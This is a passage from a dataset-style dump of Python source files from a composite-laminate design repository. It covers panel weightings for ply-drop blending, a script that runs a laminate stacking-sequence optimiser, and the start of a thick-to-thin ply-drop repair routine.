else:\r\n self.boundary_weights[\r\n (panel1_in_strip, panel2_in_strip)] = weight \r\n \r\n\r\n def calc_panel_weigthings(self, multipanel):\r\n \"\"\"\r\n returns the panel weightings for the objective function at each step\r\n of the thick-to-thin or thin-to-thick repair\r\n\r\n The function accounts only for the panel for which the ply drop will be\r\n determined.\r\n\r\n Moreover, the weightings of panel assumed to have the same lamination\r\n parameters are aggregated\r\n \"\"\"\r\n self.actual_panel_weightings = np.zeros((self.n_panels,))\r\n for ind_panel, panel in enumerate(self.panels):\r\n self.actual_panel_weightings[\r\n self.ind_panels_guide[ind_panel]] += panel.weighting\r\n\r\n list_all = [[] for ind in range(self.n_panels)]\r\n\r\n for ind_panel in range(self.ind_ref):\r\n\r\n # print('multipanel.reduced.actual_panel_weightings',\r\n # multipanel.reduced.actual_panel_weightings)\r\n panel_weightings = np.copy(\r\n self.actual_panel_weightings)[:self.ind_ref]\r\n panel_weightings /= sum(panel_weightings)\r\n # print('panel_weightings', panel_weightings)\r\n to_add, panel_weightings = (panel_weightings[:ind_panel],\r\n panel_weightings[ind_panel:])\r\n # print('panel_weightings', panel_weightings, 'to_add', to_add)\r\n panel_weightings[0] += sum(to_add)\r\n list_all[ind_panel] = panel_weightings\r\n # print('panel_weightings', panel_weightings)\r\n\r\n for ind_panel in range(self.ind_ref + 1, self.n_panels):\r\n\r\n # print('self.actual_panel_weightings',\r\n # self.actual_panel_weightings)\r\n panel_weightings = np.copy(\r\n self.actual_panel_weightings)[self.ind_ref + 1:] # YEEEES\r\n panel_weightings /= sum(panel_weightings)\r\n # print('panel_weightings', panel_weightings)\r\n panel_weightings, to_add = (\r\n panel_weightings[:ind_panel - self.ind_ref],\r\n panel_weightings[ind_panel - self.ind_ref:])\r\n # print('panel_weightings', panel_weightings, 'to_add', to_add)\r\n panel_weightings[-1] += sum(to_add)\r\n list_all[ind_panel] = panel_weightings\r\n # print('panel_weightings', panel_weightings)\r\n\r\n self.panel_weightings = list_all\r\n\r\n\r\n def calc_parameters(self, multipanel, constraints):\r\n \"\"\"\r\n caluclates values usefull 
during the beam search for thick-to-thin or\r\n thin-to-thick repair\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel structure\r\n\r\n OUTPUTS\r\n\r\n - n_steps: number of ply drops to investigate\r\n - ind_panel_tab: index of panel where the next ply drop is located at each\r\n step of the beam search\r\n - n_plies_panel_after_tab: total number of plies in panel where the next\r\n ply drop is located at each step of the beam search\r\n - n_plies_after_tab: number of plies in panel after the next ply drop dealt\r\n with at each step of the beam search\r\n - n_plies_before_tab: number of plies in panel before the next ply drop\r\n dealt with at each step of the beam search\r\n - new_boundary_tab: indicate if the next ply drop to optimise is the first\r\n to be optimised in the panel, at each step of the beam search\r\n - n_panels_designed_tab: number of panels for which the ply drops have been\r\n designed so far\r\n \"\"\"\r\n ### thick to thin\r\n n_steps = self.n_plies_ref_panel - self.n_plies_in_panels[0]\r\n\r\n if constraints.sym:\r\n n_steps //= 2\r\n\r\n if not n_steps:\r\n self.n_steps_thin = 0\r\n self.ind_panel_thin_tab = None\r\n self.n_plies_after_thin_tab = None\r\n self.n_plies_before_thin_tab = None\r\n self.new_boundary_thin_tab = None\r\n self.n_panels_designed_thin_tab = None\r\n\r\n else:\r\n\r\n ind_panel_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_panel_after_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_after_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_before_tab = np.zeros((n_steps,), dtype='int16')\r\n n_panels_designed_tab = np.zeros((n_steps,), dtype='int16')\r\n new_boundary_tab = np.zeros((n_steps,), bool)\r\n\r\n ind_panel_tab[0] = self.ind_ref - 1\r\n n_plies_panel_after_tab[0] = self.n_plies_in_panels[\r\n ind_panel_tab[0]]\r\n if constraints.sym:\r\n n_plies_after_tab[0] = self.n_plies_ref_panel - 2\r\n else:\r\n n_plies_after_tab[0] = self.n_plies_ref_panel - 1\r\n n_plies_before_tab[0] = self.n_plies_ref_panel\r\n new_boundary_tab[0] = True\r\n\r\n for ind_step in range(1, n_steps):\r\n # add same values\r\n ind_panel_tab[ind_step] = ind_panel_tab[ind_step - 1]\r\n n_plies_after_tab[ind_step] = n_plies_after_tab[ind_step - 1]\r\n n_plies_before_tab[ind_step] = n_plies_before_tab[ind_step - 1]\r\n n_plies_panel_after_tab[ind_step] = n_plies_panel_after_tab[\r\n ind_step - 1]\r\n\r\n if constraints.sym:\r\n n_plies_after_tab[ind_step] -= 2\r\n n_plies_before_tab[ind_step] -= 2\r\n else:\r\n n_plies_after_tab[ind_step] -= 1\r\n n_plies_before_tab[ind_step] -= 1\r\n if n_plies_after_tab[ind_step] < n_plies_panel_after_tab[ind_step]:\r\n ind_panel_tab[ind_step] -= 1\r\n n_plies_panel_after_tab[\r\n ind_step] = self.n_plies_in_panels[\r\n ind_panel_tab[ind_step]]\r\n new_boundary_tab[ind_step] = True\r\n else:\r\n new_boundary_tab[ind_step] = False\r\n\r\n n_panels_designed_tab[ind_step] = n_panels_designed_tab[ind_step - 1]\r\n if new_boundary_tab[ind_step]:\r\n n_panels_designed_tab[ind_step] += 1\r\n\r\n self.n_steps_thin = n_steps\r\n self.ind_panel_thin_tab = ind_panel_tab\r\n self.n_plies_after_thin_tab = n_plies_after_tab\r\n self.n_plies_before_thin_tab = n_plies_before_tab\r\n self.new_boundary_thin_tab = new_boundary_tab\r\n self.n_panels_designed_thin_tab = n_panels_designed_tab\r\n\r\n ### thin to thick\r\n\r\n n_steps = self.n_plies_in_panels[-1] - self.n_plies_ref_panel\r\n\r\n if constraints.sym:\r\n n_steps //= 2\r\n\r\n if not n_steps:\r\n self.n_steps_thick = 0\r\n self.ind_panel_thick_tab = None\r\n 
self.n_plies_after_thick_tab = None\r\n self.n_plies_before_thick_tab = None\r\n self.new_boundary_thick_tab = None\r\n self.n_panels_designed_thick_tab = None\r\n else:\r\n ind_panel_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_panel_after_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_after_tab = np.zeros((n_steps,), dtype='int16')\r\n n_plies_before_tab = np.zeros((n_steps,), dtype='int16')\r\n n_panels_designed_tab = np.zeros((n_steps,), dtype='int16')\r\n new_boundary_tab = np.zeros((n_steps,), bool)\r\n\r\n ind_panel_tab[0] = self.ind_ref + 1\r\n n_plies_panel_after_tab[0] = self.n_plies_in_panels[\r\n ind_panel_tab[0]]\r\n if constraints.sym:\r\n n_plies_after_tab[0] = self.n_plies_ref_panel + 2\r\n else:\r\n n_plies_after_tab[0] = self.n_plies_ref_panel + 1\r\n n_plies_before_tab[0] = self.n_plies_ref_panel\r\n new_boundary_tab[0] = True\r\n\r\n for ind_step in range(1, n_steps):\r\n # add same values\r\n ind_panel_tab[ind_step] = ind_panel_tab[ind_step - 1]\r\n n_plies_after_tab[ind_step] = n_plies_after_tab[ind_step - 1]\r\n n_plies_before_tab[ind_step] = n_plies_before_tab[ind_step - 1]\r\n n_plies_panel_after_tab[ind_step] = n_plies_panel_after_tab[\r\n ind_step - 1]\r\n\r\n if constraints.sym:\r\n n_plies_after_tab[ind_step] += 2\r\n n_plies_before_tab[ind_step] += 2\r\n else:\r\n n_plies_after_tab[ind_step] += 1\r\n n_plies_before_tab[ind_step] += 1\r\n if n_plies_after_tab[ind_step] > n_plies_panel_after_tab[ind_step]:\r\n ind_panel_tab[ind_step] += 1\r\n n_plies_panel_after_tab[\r\n ind_step] = self.n_plies_in_panels[\r\n ind_panel_tab[ind_step]]\r\n new_boundary_tab[ind_step] = True\r\n else:\r\n new_boundary_tab[ind_step] = False\r\n\r\n n_panels_designed_tab[ind_step] = n_panels_designed_tab[ind_step - 1]\r\n if new_boundary_tab[ind_step]:\r\n n_panels_designed_tab[ind_step] += 1\r\n\r\n\r\n self.n_steps_thick = n_steps\r\n self.ind_panel_thick_tab = ind_panel_tab\r\n self.n_plies_after_thick_tab = n_plies_after_tab\r\n self.n_plies_before_thick_tab = n_plies_before_tab\r\n self.new_boundary_thick_tab = new_boundary_tab\r\n self.n_panels_designed_thick_tab = n_panels_designed_tab\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n return f\"\"\"\r\nReduced multipanel structure (blending strip):\r\n Number of panels: {self.n_panels}\r\n Number of plies per panel (ordered): {self.n_plies_in_panels}\r\n Number of plies in reference panel: {self.n_plies_ref_panel}\r\n Indices of panel middle plies: {self.middle_ply_indices}\r\n Reduced index of thick panel: {self.ind_thick}\r\n Reduced index of reference panel: {self.ind_ref}\r\n Panel boundaries in reduced indices: {self.boundaries}\r\n Mapping multipanel structure to blending strip: {self.ind_panels_guide}\r\n Mapping blending strip to multipanel structure: {self.ind_for_reduc}\r\n\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n from src.BELLA.panels import Panel\r\n from src.BELLA.constraints import Constraints\r\n from src.BELLA.multipanels import MultiPanel\r\n constraints = Constraints(sym=True)\r\n panel1 = Panel(1, constraints, neighbour_panels=[5], n_plies=12)\r\n panel2 = Panel(5, constraints, neighbour_panels=[1], n_plies=16)\r\n panel3 = Panel(2, constraints, neighbour_panels=[1, 5], n_plies=14)\r\n panel4 = Panel(6, constraints, neighbour_panels=[1], n_plies=10)\r\n multipanel = MultiPanel([panel1, panel2, panel3, panel4])\r\n print(multipanel)\r\n multipanel.from_mp_to_blending_strip(constraints, n_plies_ref_panel=12)\r\n 
print(multipanel.reduced)\r\n# print(multipanel.reduced.panels)\r\n"
},
{
"alpha_fraction": 0.5744543671607971,
"alphanum_fraction": 0.6122110486030579,
"avg_line_length": 33.148868560791016,
"blob_id": "3ca157a6539fd0d154ab5a51c5fca5669864dcb8",
"content_id": "599cbefb5ae6eb59dc9b26685452fd07715c7fb8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10859,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 309,
"path": "/src/LAYLA_V02/scripts/run_LAYLA_V02.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script retrieves LAminate LAY-ups from one set of lamination parameters.\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport time\r\n\r\nimport numpy as np\r\nimport numpy.matlib\r\nimport math as ma\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.LAYLA_V02.targets import Targets\r\nfrom src.LAYLA_V02.parameters import Parameters\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.LAYLA_V02.optimiser import LAYLA_optimiser\r\nfrom src.CLA.lampam_functions import calc_lampam_2\r\nfrom src.BELLA.materials import Material\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\n#==============================================================================\r\n# Targets\r\n#==============================================================================\r\n# Total number of plies\r\nn_plies = 61\r\n# Stacking sequence target\r\nss_target = np.array([45, 90, -45, 0, 0], dtype='int16')\r\nprint_ss(ss_target, 200)\r\n\r\n# Calculation of target lamination parameters\r\nlampam = calc_lampam_2(ss_target)\r\nprint_lampam(lampam)\r\n\r\ntargets = Targets(n_plies=n_plies, lampam=lampam, stack=ss_target)\r\n\r\n#==============================================================================\r\n# Type of optimisations\r\n#==============================================================================\r\noptimisation_type = 'A' # only in-plane lamination parameters optimised\r\noptimisation_type = 'D' # only out-of-plane lamination parameters optimised\r\noptimisation_type = 'AD' # in- and out-of-plane lamination parameters optimised\r\n\r\n#==============================================================================\r\n# Design guidelines\r\n#==============================================================================\r\n### Set of design and manufacturing constraints:\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n# C0: - No design and manufacturing constraints other than symmetry\r\n# C1: - in-plane orthotropy enforced with penalties and repair\r\n# - 10% rule enforced with repair\r\n# - 10% 0deg plies\r\n# - 10% 90 deg plies\r\n# - 10% 45deg plies\r\n# - 10% -45 deg plies\r\n# - disorientation rule with Delta(theta) = 45 deg\r\n# - contiguity rule with n_contig = 5\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\nset_of_angles = np.array([-45, 0, 45, 90, +30, -30, +60, -60], dtype=int)\r\n\r\n# symmetry\r\nsym = False\r\n\r\n# balance and in-plane orthotropy requirements\r\nif constraints_set == 'C0':\r\n bal = False\r\n ipo = False\r\nelse:\r\n bal = True\r\n ipo = True\r\n\r\n# out-of-plane orthotropy requirements\r\noopo = False\r\n\r\n# damage tolerance\r\ndam_tol = True\r\n# rule 1: one outer ply at + or -45 deg at laminate surfaces\r\n# rule 2: [+45, -45] or [-45, +45] plies at laminate surfaces\r\n# rule 3: [+45, -45], [+45, +45], [-45, -45] or [-45, +45] plies at laminate\r\ndam_tol_rule = 1\r\ndam_tol_rule = 2\r\n#dam_tol_rule = 3\r\n\r\n# 10% rule\r\nif constraints_set == 'C0':\r\n rule_10_percent = False\r\nelse:\r\n rule_10_percent = True\r\ncombine_45_135 = True\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 = 10 # percentage used in the 
10% rule for +-45 deg plies\r\n\r\n# disorientation\r\nif constraints_set == 'C0':\r\n diso = False\r\nelse:\r\n diso = True\r\n\r\n# Upper bound of the variation of fibre orientation between two\r\n# contiguous plies if the disorientation constraint is active\r\ndelta_angle = 45\r\n\r\n# contiguity\r\nif constraints_set == 'C0':\r\n contig = False\r\nelse:\r\n contig = True\r\n\r\nn_contig = 4\r\n# No more that constraints.n_contig plies with same fibre orientation should be\r\n# next to each other if the contiguity constraint is active. The value taken\r\n# can only be 2, 3, 4 or 5, otherwise test functions should be modified\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n ipo=ipo,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n rule_10_percent=rule_10_percent,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles)\r\n\r\n#==============================================================================\r\n# Material properties\r\n#==============================================================================\r\n# Elastic modulus in the fibre direction (Pa)\r\nE11 = 130e9\r\n# Elastic modulus in the transverse direction (Pa)\r\nE22 = 9e9\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.3\r\n# In-plane shear modulus (Pa)\r\nG12 = 4e9\r\nmat_prop = Material(E11 = E11, E22 = E22, G12 = G12, nu12 = nu12)\r\n\r\n#==============================================================================\r\n# Optimiser Parameters\r\n#==============================================================================\r\n# number of outer loops\r\nn_outer_step = 1\r\n\r\n# branching limit for global pruning during ply orientation optimisation\r\nglobal_node_limit = 8\r\n# branching limit for local pruning during ply orientation optimisation\r\nlocal_node_limit = 8\r\n# branching limit for global pruning at the penultimate level during ply\r\n# orientation optimisation\r\nglobal_node_limit_p = 8\r\n# branching limit for local pruning at the last level during ply\r\n# orientation optimisation\r\nlocal_node_limit_final = 1\r\n\r\n### Techniques to enforce the constraints\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = True\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = True\r\n\r\n# penalty for the 10% rule based on ply count restrictions\r\npenalty_10_pc_switch = False\r\n# penalty for the 10% rule based on lamination parameter restrictions\r\npenalty_10_lampam_switch = True\r\n# penalty for in-plane orthotropy, based on lamination parameters\r\npenalty_ipo_switch = True\r\n# penalty for balance, based on ply counts\r\npenalty_bal_switch = False\r\n# balanced laminate scheme\r\nbalanced_scheme = False\r\n\r\nif constraints_set == 'C0':\r\n # penalty for the 10% rule based on ply count restrictions\r\n penalty_10_pc_switch = False\r\n # penalty for the 10% rule based on lamination parameter restrictions\r\n penalty_10_lampam_switch = False\r\n # penalty for in-plane orthotropy, based on lamination parameters\r\n penalty_ipo_switch = False\r\n # penalty for balance, based on ply counts\r\n penalty_bal_switch = False\r\n\r\n# Coefficient for the 10% rule 
penalty\r\ncoeff_10 = 1\r\n# Coefficients for the in-plane orthotropy penalty or the balance penalty\r\ncoeff_bal_ipo = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n### Other parameters\r\n\r\n# Minimum group size allowed for the smallest groups\r\ngroup_size_min = 5\r\n# Desired number of plies for the groups at each outer loop\r\ngroup_size_max = np.array([1000, 12, 12, 12, 12])\r\n\r\n# Lamination parameters to be considered in the multi-objective functions\r\n# (note: comparing arrays with 'is' always evaluates to False; np.array_equal\r\n# performs the intended element-wise comparison)\r\nif optimisation_type == 'A':\r\n    if np.array_equal(constraints.set_of_angles, np.array([-45, 0, 45, 90], int)):\r\n        lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n    else:\r\n        lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nif optimisation_type == 'D':\r\n    if np.array_equal(constraints.set_of_angles, np.array([-45, 0, 45, 90], int)):\r\n        lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n    else:\r\n        lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nif optimisation_type == 'AD':\r\n    if np.array_equal(constraints.set_of_angles, np.array([-45, 0, 45, 90], int)):\r\n        lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n    else:\r\n        lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n# Lamination parameter sensitivities from the first-level optimiser\r\nfirst_level_sensitivities = np.ones((12,), float)\r\n\r\nparameters = Parameters(\r\n    constraints=constraints,\r\n    coeff_10=coeff_10,\r\n    coeff_bal_ipo=coeff_bal_ipo,\r\n    coeff_oopo=coeff_oopo,\r\n    p_A=p_A,\r\n    n_D1=n_D1,\r\n    n_D2=n_D2,\r\n    n_D3=n_D3,\r\n    n_outer_step=n_outer_step,\r\n    group_size_min=group_size_min,\r\n    group_size_max=group_size_max,\r\n    first_level_sensitivities=first_level_sensitivities,\r\n    lampam_to_be_optimised=lampam_to_be_optimised,\r\n    global_node_limit=global_node_limit,\r\n    local_node_limit=local_node_limit,\r\n    global_node_limit_p=global_node_limit_p,\r\n    local_node_limit_final=local_node_limit_final,\r\n    repair_membrane_switch=repair_membrane_switch,\r\n    repair_flexural_switch=repair_flexural_switch,\r\n    penalty_10_lampam_switch=penalty_10_lampam_switch,\r\n    penalty_10_pc_switch=penalty_10_pc_switch,\r\n    penalty_ipo_switch=penalty_ipo_switch,\r\n    penalty_bal_switch=penalty_bal_switch)\r\n\r\n#==============================================================================\r\n# Optimiser Run\r\n#==============================================================================\r\nprint('Algorithm running')\r\n\r\n#print(targets)\r\n#print(mat_prop)\r\n#print(constraints)\r\n#print(parameters)\r\n\r\nt = time.time()\r\nresult = LAYLA_optimiser(parameters, constraints, targets, mat_prop)\r\nelapsed1 = time.time() - t\r\n\r\n#==============================================================================\r\n# Results Display\r\n#==============================================================================\r\nprint()\r\n\r\nprint('\\\\\\\\\\\\\\\\\\\\\\ objective with modified lamination parameters: ',\r\n      
result.objective)\r\n\r\nprint('\\\\\\\\\\\\\\\\\\\\\\ Elapsed time : ', elapsed1, 's')\r\n\r\nprint('\\nRetrieved stacking sequence')\r\nprint_ss(result.ss)\r\n\r\nprint('Difference of lamination parameters')\r\nprint_lampam(result.lampam - targets.lampam)\r\n\r\nprint('\\nRetrieved lamination parameters')\r\nprint_lampam(result.lampam)\r\n\r\nprint(f'\\nNumber of outer loops performed: {result.number_of_outer_steps_performed}')\r\n\r\nprint('result.n_designs_repaired_unique_tab',\r\n result.n_designs_repaired_unique_tab)"
},
{
"alpha_fraction": 0.5221524834632874,
"alphanum_fraction": 0.5288791060447693,
"avg_line_length": 45.49923324584961,
"blob_id": "5c9334fea25320484dc857966ebeee37083ce6d0",
"content_id": "78b66fb68fe3829b07e336c4132bcceb99caccce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 30922,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 651,
"path": "/src/RELAY/thick_to_thin.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions used for the repair of panels with the thick-to-thin methodology:\r\n plies of a reference stacking sequence are left unchanged and the\r\n positions of the ply drops necessary to design the thinner panels are\r\n re-optimised with the objective to better match panel lamination\r\n parameter targets while also satisfying design and manufacturing\r\n constraints\r\n\r\n- repair_thick_to_thin\r\n performs repair of multi-panel structure by modifying the ply drop layout\r\n with the thick-to-thin methodology\r\n\r\n- calc_panel_weigthings\r\n returns the panel weightings for the objective function at each step of the\r\n thick-to-thin or thin-to-thick repair\r\n\r\n- calc_parameters\r\n caluclates values usefull during the beam search for thick-to-thin or\r\n thin-to-thick repair\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\nfrom copy import deepcopy\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.guidelines.ply_drop_spacing import is_same_pdl\r\nfrom src.guidelines.contiguity import calc_penalty_contig_ss\r\nfrom src.guidelines.disorientation import calc_n_penalty_diso_ss\r\n# from src.guidelines.ipo_oopo import calc_penalty_oopo_ss\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.BELLA.objectives import calc_obj_one_panel\r\nfrom src.BELLA.objectives import calc_obj_multi_panel\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.divers.pretty_print import print_list_ss\r\n\r\n# if apply_balance_1_by_1 == True\r\n# - if an angled ply is added/removed from a balance panel, the next ply\r\n# to be removed/added rectify balance\r\n# otherwise\r\n# - all panels of the blending strip are enforced to be balance. 
This can\r\n# cause issues if the blending strip contains many panels with\r\n# incremental ply counts\r\napply_balance_1_by_1 = True\r\n\r\ndef repair_thick_to_thin(\r\n reduced_lampam, reduced_sst, reduced_ss,\r\n multipanel, parameters, obj_func_param, constraints, mat=0):\r\n \"\"\"\r\n performs repair of multi-panel structure by modifying the ply drop layout\r\n with the thick-to-thin methodology:\r\n plies of a reference stacking sequence are left unchanged and the\r\n positions of the ply drops necessary to design the thinner panels are\r\n re-optimised with the objective to better match panel lamination\r\n parameter targets while also satisfying design and manufacturing\r\n constraints\r\n \"\"\"\r\n ### initialisation\r\n ss_ref = np.copy(reduced_ss[multipanel.reduced.ind_ref])\r\n pdl_ref = np.copy(reduced_sst[multipanel.reduced.ind_ref])\r\n n_plies_max = multipanel.reduced.n_plies_in_panels[-1]\r\n# print_list_ss(reduced_sst)\r\n\r\n n_steps = multipanel.reduced.n_steps_thin\r\n ind_panel_tab = multipanel.reduced.ind_panel_thin_tab\r\n new_boundary_tab = multipanel.reduced.new_boundary_thin_tab\r\n# print('n_steps', n_steps)\r\n# print('ind_panel_tab', ind_panel_tab)\r\n# print('new_boundary_tab', new_boundary_tab)\r\n\r\n if n_steps == 0: # no change\r\n return True, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n ## list of ply drop position indices\r\n if constraints.sym:\r\n all_pdl_indices_tab = [[ind for ind, elem in enumerate(reduced_sst[\r\n multipanel.reduced.ind_ref][:n_plies_max // 2]) if elem == -1]]\r\n else:\r\n all_pdl_indices_tab = [[ind for ind, elem in enumerate(reduced_sst[\r\n multipanel.reduced.ind_ref][:n_plies_max]) if elem == -1]]\r\n# print('all_pdl_indices_tab', all_pdl_indices_tab)\r\n last_pdl_index_tab = [None]\r\n\r\n ## ply-drop layouts\r\n initial_pdl = [None for ind in range(multipanel.reduced.n_panels)]\r\n initial_pdl[\r\n multipanel.reduced.ind_ref] = reduced_sst[multipanel.reduced.ind_ref]\r\n pdls_tab = [initial_pdl]\r\n# print('initial_pdl', initial_pdl)\r\n\r\n ## lamination parameters\r\n initial_lampam = [None for ind in range(multipanel.reduced.n_panels)]\r\n initial_lampam[multipanel.reduced.ind_ref] \\\r\n = reduced_lampam[multipanel.reduced.ind_ref]\r\n lampam_tab = [initial_lampam]\r\n\r\n ## number of plies in each direction\r\n n_plies_per_angle_ref = np.zeros(\r\n (constraints.n_set_of_angles), dtype='float16')\r\n for index in range(ss_ref.size):\r\n index = constraints.ind_angles_dict[ss_ref[index]]\r\n n_plies_per_angle_ref[index] += 1\r\n initial_n_plies_per_angle = [\r\n None for ind in range(multipanel.reduced.n_panels)]\r\n initial_n_plies_per_angle[multipanel.reduced.ind_ref] \\\r\n = np.copy(n_plies_per_angle_ref)\r\n n_plies_per_angle_tab = [initial_n_plies_per_angle]\r\n\r\n ## penalties\r\n initial_pdl_diso = [None for ind in range(multipanel.reduced.n_panels)]\r\n initial_pdl_diso[multipanel.reduced.ind_ref] = 0\r\n penalty_diso_tab = [initial_pdl_diso]\r\n\r\n # initial_pdl_contig = [None for ind in range(multipanel.reduced.n_panels)]\r\n # initial_pdl_contig[multipanel.reduced.ind_ref] = 0\r\n # penalty_contig_tab = [initial_pdl_contig]\r\n\r\n # initial_pdl_oopo = [None for ind in range(multipanel.reduced.n_panels)]\r\n # initial_pdl_oopo[multipanel.reduced.ind_ref] = 0\r\n # penalty_oopo_tab = [initial_pdl_oopo]\r\n\r\n # initial_pdl_10 = [None for ind in range(multipanel.reduced.n_panels)]\r\n # initial_pdl_10[multipanel.reduced.ind_ref] = 0\r\n # penalty_10_tab = [initial_pdl_10]\r\n\r\n penalty_spacing_tab = 
[None]\r\n\r\n angle_queue_tab = [np.array((), dtype=int)]\r\n\r\n ## objectives\r\n obj_no_constraints_tab = [[\r\n None for ind in range(multipanel.reduced.n_panels)]]\r\n obj_constraints_tab = np.zeros((1,), dtype=float)\r\n\r\n n_obj_func_calls = 0\r\n\r\n for ind_step in range(n_steps):\r\n# print('ind_step', ind_step)\r\n\r\n if len(obj_constraints_tab) == 0:\r\n return False, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n# print('len(obj_constraints_tab)',\r\n# len(obj_constraints_tab))\r\n\r\n for node in range(len(obj_constraints_tab)):\r\n\r\n ### selection of node to be branched (first in the list)\r\n mother_pdl = pdls_tab.pop(0)\r\n mother_all_pdl_indices = all_pdl_indices_tab.pop(0)\r\n mother_lampam = lampam_tab.pop(0)\r\n mother_n_plies_per_angle = n_plies_per_angle_tab.pop(0)\r\n mother_obj_no_constraints = obj_no_constraints_tab.pop(0)\r\n mother_penalty_diso = penalty_diso_tab.pop(0)\r\n # mother_penalty_contig = penalty_contig_tab.pop(0)\r\n mother_angle_queue = angle_queue_tab.pop(0)\r\n # mother_penalty_oopo = penalty_oopo_tab.pop(0)\r\n # mother_penalty_10 = penalty_10_tab.pop(0)\r\n del penalty_spacing_tab[0]\r\n del last_pdl_index_tab[0]\r\n obj_constraints_tab = np.delete(obj_constraints_tab, np.s_[0])\r\n\r\n ### branching + pruning for damage tolerance rule and covering rule\r\n # pd : index of ply deleted from reference stacking sequence\r\n if constraints.covering:\r\n if constraints.n_covering == 1:\r\n if constraints.sym:\r\n child_pd_indices = np.arange(1, n_plies_max // 2)\r\n else:\r\n child_pd_indices = np.arange(1, n_plies_max - 1)\r\n\r\n elif constraints.n_covering == 2:\r\n if constraints.sym:\r\n child_pd_indices = np.arange(2, n_plies_max // 2)\r\n else:\r\n child_pd_indices = np.arange(2, n_plies_max - 2)\r\n else:\r\n if constraints.sym:\r\n child_pd_indices = np.arange(n_plies_max // 2)\r\n else:\r\n child_pd_indices = np.arange(n_plies_max)\r\n\r\n ### remove duplicates\r\n child_pd_indices = np.setdiff1d(child_pd_indices,\r\n mother_all_pdl_indices)\r\n\r\n n_tab_nodes = 0\r\n tab_child_pdl = []\r\n tab_all_pdl_indices = []\r\n tab_penalty_spacing = []\r\n tab_angle_queue = []\r\n tab_last_pdl_index = []\r\n\r\n for one_pd_index in child_pd_indices:\r\n# print('one_pd_index', one_pd_index)\r\n\r\n ### pruning for balance\r\n if constraints.bal:\r\n angle = pdl_ref[one_pd_index]\r\n\r\n if apply_balance_1_by_1:\r\n if mother_angle_queue \\\r\n and angle != -mother_angle_queue[0]:\r\n continue\r\n else:\r\n if mother_angle_queue:\r\n if angle != - mother_angle_queue[0]:\r\n continue\r\n elif (ind_step == n_steps - 1 \\\r\n or new_boundary_tab[ind_step + 1]) \\\r\n and angle not in (0, 90):\r\n continue\r\n\r\n if constraints.bal:\r\n if mother_angle_queue:\r\n tab_angle_queue.append([])\r\n elif angle not in (0, 90):\r\n tab_angle_queue.append([angle])\r\n else:\r\n tab_angle_queue.append([])\r\n else:\r\n 